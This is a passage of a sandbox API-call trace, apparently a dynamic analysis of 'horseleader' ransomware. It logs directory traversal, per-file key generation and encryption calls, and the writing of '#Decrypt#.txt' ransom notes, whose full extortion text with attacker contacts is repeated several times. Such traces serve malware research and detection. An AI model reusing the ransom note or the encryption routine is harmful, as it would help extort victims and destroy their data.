(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.936] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.936] CloseHandle (hObject=0x21c) returned 1 [0250.936] GetProcessHeap () returned 0x780000 [0250.936] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0250.936] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0250.936] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0250.937] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\#Decrypt#.txt") returned 61 [0250.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\speechengines\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0250.937] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.937] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0250.939] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.939] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0250.939] CloseHandle (hObject=0x1cc) returned 1 [0250.939] GetProcessHeap () returned 0x780000 [0250.939] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.939] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="System", cAlternateFileName="")) returned 1 [0250.939] lstrcmpiW (lpString1="System", lpString2="Windows") returned -1 [0250.939] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System") returned 40 [0250.939] lstrcmpW (lpString1="System", lpString2=".") returned 1 [0250.939] lstrcmpW (lpString1="System", lpString2="..") returned 1 [0250.939] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.939] GetProcessHeap () returned 0x780000 [0250.939] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.939] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\*") returned 42 [0250.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0250.965] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.965] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\.") returned 42 [0250.965] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.965] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0250.966] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.966] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\..") returned 43 [0250.966] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.966] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.966] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ado", cAlternateFileName="")) returned 1 [0250.966] lstrcmpiW (lpString1="ado", lpString2="Windows") returned -1 [0250.966] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 44 [0250.966] lstrcmpW (lpString1="ado", lpString2=".") returned 1 [0250.966] lstrcmpW (lpString1="ado", lpString2="..") returned 1 [0250.966] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.966] GetProcessHeap () returned 0x780000 [0250.966] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0250.966] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*") returned 46 [0250.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.969] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.969] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.") returned 46 [0250.969] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.969] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.969] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.969] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\..") returned 47 [0250.969] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.970] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.970] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c91ed4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa4c91ed4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa06f97f7, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x3912, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="adojavas.inc", cAlternateFileName="")) returned 1 [0250.970] lstrcmpiW (lpString1="adojavas.inc", lpString2="Windows") returned -1 [0250.970] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 57 [0250.970] StrStrIW (lpFirst="adojavas.inc", lpSrch=".horseleader") returned 0x0 [0250.970] lstrcmpW (lpString1="adojavas.inc", lpString2="#Decrypt#.txt") returned 1 [0250.970] lstrcmpW (lpString1="adojavas.inc", lpString2="_uninstalling_.png") returned 1 [0250.970] lstrlenW (lpString=".testttjffg") returned 11 [0250.970] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc", lpSrch=".testttjffg") returned 0x0 [0250.970] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.970] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.970] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.971] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4085067, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa4085067, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa0661283, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x3a67, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="adovbs.inc", cAlternateFileName="")) returned 1 [0250.971] lstrcmpiW (lpString1="adovbs.inc", lpString2="Windows") returned -1 [0250.971] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 55 [0250.971] StrStrIW (lpFirst="adovbs.inc", lpSrch=".horseleader") returned 0x0 [0250.971] lstrcmpW (lpString1="adovbs.inc", lpString2="#Decrypt#.txt") returned 1 [0250.971] lstrcmpW (lpString1="adovbs.inc", lpString2="_uninstalling_.png") returned 1 [0250.971] lstrlenW (lpString=".testttjffg") returned 11 [0250.971] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc", lpSrch=".testttjffg") returned 0x0 [0250.972] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.972] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.972] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0250.972] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0250.972] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US") returned 50 [0250.972] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0250.972] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0250.972] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.972] GetProcessHeap () returned 0x780000 [0250.972] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.972] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*") returned 52 [0250.972] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.973] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.973] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\.") returned 52 [0250.973] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.973] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0250.973] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.973] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\..") returned 53 [0250.973] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.973] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.973] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 1 [0250.973] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="Windows") returned -1 [0250.974] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 67 [0250.974] StrStrIW (lpFirst="msader15.dll.mui", lpSrch=".horseleader") returned 0x0 [0250.974] lstrcmpW (lpString1="msader15.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0250.974] lstrcmpW (lpString1="msader15.dll.mui", lpString2="_uninstalling_.png") returned 1 [0250.974] lstrlenW (lpString=".testttjffg") returned 11 [0250.974] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui", lpSrch=".testttjffg") returned 0x0 [0250.974] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.974] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.975] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 0 [0250.975] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.975] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\#Decrypt#.txt") returned 64 [0250.975] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.976] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.976] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.978] lstrlenA 